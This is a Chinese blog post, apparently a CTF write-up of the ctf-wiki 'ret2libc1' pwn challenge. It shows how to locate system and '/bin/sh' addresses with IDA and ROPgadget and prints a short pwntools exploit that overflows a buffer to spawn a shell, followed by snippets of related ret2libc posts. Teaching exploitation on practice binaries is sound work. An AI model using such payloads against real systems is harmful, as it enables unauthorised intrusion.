basic rop ret2libc(1)

最新推荐文章于 2024-02-29 19:31:35 发布
最新推荐文章于 2024-02-29 19:31:35 发布
阅读量240 收藏
点赞数
分类专栏: ctf-wiki-pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214735/article/details/98864107
版权

题目:ret2libc1
类似的题型我应该做过,就是找到system的地址和/bin/sh的地址,然后进行拼接传给系统。
wp:
checksec开始:
在这里插入图片描述
用ida看函数:
在这里插入图片描述
在这里插入图片描述
和前面的一样不做过多的赘述
主要的思路是,要找到system和/bin/sh的地址。
寻找/bin/sh 的地址有两个方法,一个是用ida字符串:
在这里插入图片描述
另一种使用ROPgadget来查询字符串的位置:
在这里插入图片描述
查找system的地址的方法建议使用ida,用ROPgadget我也不太会,我用string查出来的地址不太一样。
所以直接看ida的:
在这里插入图片描述
在call system的汇编语言中单击system进去
便可以看到system的位置
下面是exp:

from pwn import *
sh=process('./ret2libc1')
sysaddr=0x8048460
binaddr=0x8048720
payload=flat(['a'*112,sysaddr,'b'*4,binaddr])
sh.sendline(payload)
sh.interactive()
arch li
关注
专栏目录
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
基础复习(IDA调试器)
m0_72827793的博客
02-25 1634
IDA中的变与C语言中变量的行为并不完全一致,IDA中的变量有特殊的生命周期,尤其是寄存器中的变量,在超出一定范后,其值会被覆盖成其他变量的值,这是无法避免的。很多用户实际上使用的是Windows版本的IDA,该IDA可以直接调试Windows下32bit和64bit的程序。伪代码窗口中行号左侧有蓝色的圆点,这些圆点与反汇编窗口左侧蓝色的小点功能一样,都是用来切换断点的状态的。IDA使用反汇编的伪代码进行调试,同样支持反汇编的后伪代码下断点。单击这蓝色圆点,伪代码的对应类似反汇编窗口中的断点,变为红色底。
ret2libc1
m0_49959202的博客
08-06 298
文章目录ret2libc11.简单机制介绍2.程序分析3.exp编写 ret2libc1 1.简单机制介绍 ret2libc即控制程序执行libc中的函数,一般是返回至某个plt处或者函数的具体的位置(比如got表项的内容)。一般,我们选择跳转到system("/bin/sh")位置,从而获取shell。当程序调用某个函数时,程序会去plt表内查找,plt表再去got内查找,如果got内存在那么直接返回;如果不存在那么就调用查找函数搜寻需要用到的函数,然后存入got表内。 当前的ret2libc1:有sy
【PWN · ret2libc】ret2libc1
Mr_Fmnwon的博客
05-08 1498
当函数运行到调用库函数时,程序将访问对应函数的plt表项,plt表项存着代码,代码分为两部分:第一部分,跳转到对应的got表。第二部分,查找函数的真实地址,修改got表内容。 got表项存着一个地址。然而这个地址并不一开始就是libc中函数的真实地址。 一开始,got表项中地址指向plt代码的第二部分。后来,因运行plt第二部分代码段,got表内容被修改为真实函数地址。依据以上,我们可以......分享几个实用的干货小技巧,不用IDA解决此题
Performing a ret2libc Attack-InVoLuNTaRy
04-24
### 执行ret2libc攻击——InVoLuNTaRy #### 一、ret2libc攻击简介 **ret2libc**(返回到libc或返回到C库)是一种攻击技术,它允许攻击者在无需注入shellcode的情况下控制目标系统中的易受攻击进程。这种攻击方式...
ROP之ret2alsolve(32位)详解
最新发布
06-18
ROP之ret2alsolve(32位)详解
hackme.inndy.tw的rop2题目
10-15
这是https://hackme.inndy.tw/scoreboard/的rop2题目如果网站被墙或者关闭请从这里下载
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
rop轻松谈.pdf
10-21
本文將對ROP技術進行詳細的介紹,涵蓋ROP的基本概念、Buffer Overflow、ret2libc/ret2text、Return Oriented Programming等知识点。 ROP技术的基本概念 ROP技術是基於Buffer Overflow的攻擊技術,通過覆蓋函數返回...
ret2libc1pwn 入门题
02-11
pwn 入门题
攻防世界 MISC - MulTzor
c868954104的博客
11-22 201
先将第6位字符和密钥中的第6位异或得到原文,比如这里的fla" 这个"我们应该能看出本来应该是g。将16进制写入文件,官方wp说是第一位为干扰位,不写入文件。发现得到的文件每6位会有一个错误的字符。使用xortool工具进行解密得到。得到密钥3\xffSY\x8bw。我们先异或得到原为为 U。说明密钥中第6位是错误的。将其与g异或得到密钥为2。得到xorout文件。使用工具进行解密得到。
好好说话之ret2libc1
hollk’s blog
06-22 1486
题目路径: /ctf-challenges/pwn/stackoverflow/ret2libc/ret2libc1 一、原理 ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址 看C代码...
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2407
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
从零开始学逆向:理解ret2libc-1
weixin_44626085的博客
02-19 1535
ret2libc即劫持程序的控制流,使其执行libc中的函数,一般是返回到某个函数的plt处,或者某个函数的具体位置(函数对应got表的内容),大多情况下是执行system('/bin/sh')。
[CTF]PWN--新人入门第一关--Ret2libc
2301_79880752的博客
02-29 1257
首先我们需要找到pop rdi|ret这个指令在程序中的位置(前面提到该指令为程序中自带的,只不过需要我们去寻找),然后让程序返回到pop rdi|ret这个指令上去执行它,通过ROPgadget --binary pwn --only 'pop|ret' 该指令来寻找pop |ret这个指令的地址,其中ROPgadget为一个插件,需要自己下载,binary意思为一个二进制文件,后面跟着的是文件名,only后面跟着的为要搜索的命令地址。
PWN —— ret2libc1
qq_41696518的博客
07-03 452
ret2libc1
ret2libc1做题历程分享(ctfwiki)
Rt1Text的博客
02-09 276
pwn 题 ret2libc1 system与bin/sh都给出
pwn之ret2libc1
m0_75234353的博客
04-09 111
提示:payload中的BBBB,本来是exit函数,但是系统的崩溃不妨碍我们拿到flag。所以简化版就是直接填入BBBB垃圾字节。用python3计算偏移量,可得108,再加上4字节达到返回地址。看到system函数,我们可以构建ROP链来替换参数。4.利用pwntools来构造payload。发现gets函数,为栈溢出点。栈溢出保护关,栈执行关闭。3.计算所需填充的垃圾数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值